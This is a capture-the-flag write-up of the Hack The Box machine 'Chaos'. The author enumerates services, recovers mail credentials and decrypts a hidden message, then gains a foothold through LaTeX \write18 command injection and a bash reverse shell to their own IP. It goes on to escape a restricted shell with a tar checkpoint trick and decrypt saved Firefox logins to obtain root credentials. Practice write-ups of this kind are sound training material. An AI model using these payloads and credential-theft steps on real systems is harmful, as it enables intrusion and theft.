This is a write-up on how i solved the box Chaos from HacktheBox.
Hack the Box is an online platform where you practice your penetration testing skills.
About the box
This box is fun. It’s unlike other boxes that i have solved and it trolled me more than another box that is not yet retired as of the moment I am writing this.
Overall, I was learning every step of the way even though it gets a lot of hate for it being “chaotic” :)
#TLDR
Initial foothold: Mail creds obtained through an undeveloped blog leading to an encrypted message that leads to an undiscovered directory that has a document preparation system which allows command execution
User: Reusing creds and escaping restricted bash
Root: Digging the trash from Mozilla data and decrypting the credsI first run an initial nmap scan by invoking the command, saving it to our nmap directory:
nmap -sV -sC -oA nmap/initial 10.10.10.120The output is:
# Nmap 7.70 scan initiated Sun Dec 16 18:34:59 2018 as: nmap -sV -sC -oA nmap/initial 10.10.10.120
Nmap scan report for 10.10.10.120
Host is up (0.32s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE STLS CAPA RESP-CODES TOP UIDL PIPELINING
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more SASL-IR ID listed LOGIN-REFERRALS IMAP4rev1 LITERAL+ OK post-login have ENABLE LOGINDISABLEDA0001 capabilities Pre-login STARTTLS IDLE
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: SASL-IR ID more LOGIN-REFERRALS IMAP4rev1 LITERAL+ AUTH=PLAINA0001 post-login have ENABLE capabilities listed Pre-login OK IDLE
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) AUTH-RESP-CODE CAPA USER RESP-CODES TOP UIDL PIPELINING
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/
Since port 80 is open, i first go to the website:
It tells us that Direct IP not allowed which basically means that we cannot access it by simply typing its IP on the url.
I edit my /etc/hosts file and added an entry so when we go to the url chaos.htb, it can resolve to 10.10.10.120.
10.10.10.120 chaos.htbThe website can now be viewed properly. I poked the website by checking its functions and found a “blog” section which only tells us that they are working on a blog.
I also ran gobuster on chaos.htb, using the directory-list-2.3-medium.txt wordlist and saving it to the file gobuster.initial
gobuster -u http://chaos.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.initialThe results are:
/img (Status: 301)
/css (Status: 301)
/source (Status: 301)
/js (Status: 301)
/javascript (Status: 301)I then checked each directory if there is anything that is interesting, but found nothing. The /javascript is forbidden by the way. Since i found nothing interesting, i run the same gobuster command on 10.10.10.120 and the output was different.
/wp (Status: 301)
/javascript (Status: 301)The wp directory stood out and this led me to a Wordpress site that prompts us that the content is password protected. This is funny because it is a post by the user human.
http://10.10.10.120/wp/wordpress/index.php/2018/10/28/chaos/
If you use the password “human” it prompts us the webmail creds:
I tried the obtained credentials on webmin at port 10000 but is invalid. I tried avoiding the ports for imap and pop3d since I haven’t tried using them yet but I’m left with no other options. After much reading, i was able to login to the imap service and issue commands(this write-up does not do justice on the many failed attempts i had trying to “talk” to this service…).
I found this link to be very helpful: https://easyengine.io/tutorials/mail/server/testing/imap
I authenticated by invoking and using the creds obtained from wp:
openssl s_client -crlf -connect 10.10.10.120:993The “A” character is a tag so the server can respond to our requests. Everytime we issue a command to the server, we should be using a TAG(in this case, the character “A”) in the beginning.
authenticate by invoking
A LOGIN ayush jiujitsuAs you can see, i had numerous fails in trying to talk to this service. After enumerating, i found out there is one message found in the Drafts.
The content of the message can be retrieved by:
TAG FETCH 1 (BODY[text])The output is:
ME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”=_00b34a28b9033c43ed09c0950f4176e1"
Date: Sun, 28 Oct 2018 17:46:38 +0530
From: ayush <ayush@localhost>
To: undisclosed-recipients:;
Subject: service
Message-ID: <7203426a8678788517ce8d28103461bd@webmail.chaos.htb>
X-Sender: ayush@localhost
User-Agent: Roundcube Webmail/1.3.8— =_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
format=flowedHii, sahay
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush— =_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream;
name=enim_msg.txt
Content-Disposition: attachment;
filename=enim_msg.txt;
size=272MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
— =_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: text/x-python; charset=us-ascii;
name=en.py
Content-Disposition: attachment;
filename=en.py;
size=804ZGVmIGVuY3J5cHQoa2V5LCBmaWxlbmFtZSk6CiAgICBjaHVua3NpemUgPSA2NCoxMDI0CiAgICBv
dXRwdXRGaWxlID0gImVuIiArIGZpbGVuYW1lCiAgICBmaWxlc2l6ZSA9IHN0cihvcy5wYXRoLmdl
dHNpemUoZmlsZW5hbWUpKS56ZmlsbCgxNikKICAgIElWID1SYW5kb20ubmV3KCkucmVhZCgxNikK
CiAgICBlbmNyeXB0b3IgPSBBRVMubmV3KGtleSwgQUVTLk1PREVfQ0JDLCBJVikKCiAgICB3aXRo
IG9wZW4oZmlsZW5hbWUsICdyYicpIGFzIGluZmlsZToKICAgICAgICB3aXRoIG9wZW4ob3V0cHV0
RmlsZSwgJ3diJykgYXMgb3V0ZmlsZToKICAgICAgICAgICAgb3V0ZmlsZS53cml0ZShmaWxlc2l6
ZS5lbmNvZGUoJ3V0Zi04JykpCiAgICAgICAgICAgIG91dGZpbGUud3JpdGUoSVYpCgogICAgICAg
ICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICAgICAgY2h1bmsgPSBpbmZpbGUucmVhZChjaHVu
a3NpemUpCgogICAgICAgICAgICAgICAgaWYgbGVuKGNodW5rKSA9PSAwOgogICAgICAgICAgICAg
ICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBlbGlmIGxlbihjaHVuaykgJSAxNiAhPSAwOgog
ICAgICAgICAgICAgICAgICAgIGNodW5rICs9IGInICcgKiAoMTYgLSAobGVuKGNodW5rKSAlIDE2
KSkKCiAgICAgICAgICAgICAgICBvdXRmaWxlLndyaXRlKGVuY3J5cHRvci5lbmNyeXB0KGNodW5r
KSkKCmRlZiBnZXRLZXkocGFzc3dvcmQpOgogICAgICAgICAgICBoYXNoZXIgPSBTSEEyNTYubmV3
KHBhc3N3b3JkLmVuY29kZSgndXRmLTgnKSkKICAgICAgICAgICAgcmV0dXJuIGhhc2hlci5kaWdl
c3QoKQoK
— =_00b34a28b9033c43ed09c0950f4176e1 —
)
It’s an encrypted message from Ayush to Sahay. The script used to encrypt is also included . I noticed that there’s base64 text. Decoding the en.py section results to
def encrypt(key, filename):
chunksize = 64*1024
outputFile = "en" + filename
filesize = str(os.path.getsize(filename)).zfill(16)
IV =Random.new().read(16)encryptor = AES.new(key, AES.MODE_CBC, IV)with open(filename, 'rb') as infile:
with open(outputFile, 'wb') as outfile:
outfile.write(filesize.encode('utf-8'))
outfile.write(IV)while True:
chunk = infile.read(chunksize)if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' ' * (16 - (len(chunk) % 16))outfile.write(encryptor.encrypt(chunk))def getKey(password):
hasher = SHA256.new(password.encode('utf-8'))
return hasher.digest()
We are given clues on how we can decrypt by leveraging what we know based on the encryption script. The next step is to decrypt the encrypted message using the python script. The first thing i did is to Google the script(since I’m not confident with my Python skills yet).
I came across this after seeing that a part of the encryption script is included in it.
https://github.com/bing0o/Python-Scripts/blob/master/crypto.pyAfter some googling regarding the AES encryption, and a lot of reading(this step stomped as i haven’t brushed up my coding skills). I noticed also encrypted message has an initial pattern of
MDAwMDAwMDAwMDAwMDSince i have no idea on the format of the encrypted text, i tried decoding the first section of the message. After decoding, the output is:
0000000000000234zسpK8ZC⁹kWbase64: invalid input After trying to understand AES, I noticed that 0000….234 is the IV and the key is sahay(according to the message)
from Crypto.Hash import SHA256
from Crypto.Cipher import AES
import Crypto.Cipher.AES
from binascii import hexlify, unhexlifydef encrypt(key, filename):
chunksize = 64*1024
outputFile = "en" + filename
filesize = str(os.path.getsize(filename)).zfill(16)
IV =Random.new().read(16)encryptor = AES.new(key, AES.MODE_CBC, IV)with open(filename, 'rb') as infile:
with open(outputFile, 'wb') as outfile:
outfile.write(filesize.encode('utf-8'))
outfile.write(IV)while True:
chunk = infile.read(chunksize)if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' ' * (16 - (len(chunk) % 16))outfile.write(encryptor.encrypt(chunk))def getKey(password):
hasher = SHA256.new(password.encode('utf-8'))
return hasher.digest()if __name__=="__main__":
chunksize = 64*1024
mkey = getKey("sahay")
mIV = (b"0000000000000234")decipher = AES.new(mkey,AES.MODE_CBC,mIV)with open("demsg.txt", 'rb') as infile:
chunk = infile.read(chunksize)
plaintext = decipher.decrypt(chunk)
print plaintext
Decrypting the code results to:
gX)V#IqHy:šTWsLPOSGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gKAfter removing the gibberish parts and base64 decoding it thru this command
echo SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK | base64 -d The output is
Hii SahayPlease check our new service which create pdfp.s - As you told me to encrypt important msg, i did :)http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3Thanks,
Ayush
We have now have recovered the message. After accessing the website, i ran gobuster to find interesting directories
/templates (Status: 301)
/pdf (Status: 301)
/doc (Status: 301)
/assets (Status: 301)
/source (Status: 301)
/tex (Status: 301)After checking each directory, i found out that the link creates pdfs.
I then decided to use Burp to intercept the request on the pdf writing hoping for command execution
The software running is pdfTex. I tried searching for a exploitable vulnerability but found nothing until I came across this link during my research: https://0x90r00t.com/2016/02/29/internetwache-ctf-2016-web-90-texmaker-write-up/.
It’s an old CTF write-up on exploiting Latex. You can read more about the details in the link provided.
After trying to insert “\immediate\write18{id}”, I got a reply of www-data.
I know that I have code execution on the box. I know try to get a reverse shell on the box but before doing that, i need to verify the exact location of bash.
We prepare for our reverse shell by setting up our listener:
nc -nlvp 9001We know tell the machine to connect to us using the script.(url encoding it as it seems it doesn’t work when it’s plain) and putting it inside the curly braces:
/bin/bash -c "bash -i >& /dev/tcp/MyIPAddress/9001 0>&1"
We get a reverse shell.
I then invoke commands to have a proper shell.
python -c ‘import pty;pty.spawn(“/bin/bash”)’Hit Ctrl-Z and invoke
stty raw -echoThen press enter twice. Lastly, i also invoke
export TERM=xtermThese commands allow me to have a better prompt, allow auto complete, and allows me to clear the screen.
Getting User
After much enumeration, i was able to found creds for a Mysql but it didn’t work for su. I tried using the creds that we found out in WordPress earlier
ayush:jiujitsu
And we have successfully priv esc’d to the user ayush. After trying to issue commands I realize that we are in a “rbash” (restricted bash).
I searched for ways to escape it and found these resources to very helpful:
Linux Restricted Shell Bypass
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
Restricted Linux Shell Escaping Techniques
Escaping Restricted Linux Shells
I then invoke the command “export” to check the environment variables
After trying to just simply change the SHELL to /bin/bash, it didn’t work.
export SHELL="/bin/bash"I tried examples listed in the references i quoted, trying every command and example. I then decided to try the ssh escape(under advanced techniques of the https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf) but realized that port 22 is not open(not sure if this has something to do with it, but i just decided not to try ssh escapes).
I decided to start from the bottom of the list and tried doing the escape using the tar method, and it worked.
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bashI tried running basic commands to see if commands like id and whoami are working
Seeing that the error has something to do with the PATH environment variable, i tried changing the PATH using the command
export PATH="my box's path" 
I can now run the id command and check if the user.txt is legit(it is since it has 32 characters + 1 line break = 33)
Getting Root
I then enumerate by listing what i have in the directory
What struck me is there is a hidden directory called mozilla. Digging into the directory, i came across a file called profile.ini and it’s path is pointing to bzo7sjt1.default(also in the same directory as the profiles.ini)
After listing what i have inside the bzo7sjt1.default directory and finding a logins.json, i quickly ran a cat command hoping we can find creds inside it. I see fields that may be helpful to us.
Since the username and password are encrypted, i then search for “firefox logins.json decrypt” and stumbled across the first suggested search: https://github.com/unode/firefox_decrypt
I saved the script and named it firefox.decrypt and allow it to run by invoking
chmod +x ./firefox.decryptI run the command to get the creds.
ayush@chaos:~/.mozilla/firefox$ ./firefox.decrypt bzo7sjt1.default/
2019-05-15 07:25:29,926 - WARNING - profile.ini not found in bzo7sjt1.default/
2019-05-15 07:25:29,927 - WARNING - Continuing and assuming 'bzo7sjt1.default/' is a profile locationMaster Password for profile bzo7sjt1.default/:Website: https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'
It seems that these are creds to port 10000 but since we were able to privesc a while ago using su, i tried it again:
And the creds work and we are now root. Using the creds you allows you to access the webmin at port 10000 but i didn’t play with the GUI to check if there are other interesting stuff to play with.
So that’s how I did the box Chaos from Hack the Box. I hoped you learned something from this walk through. Cheers! 🍺
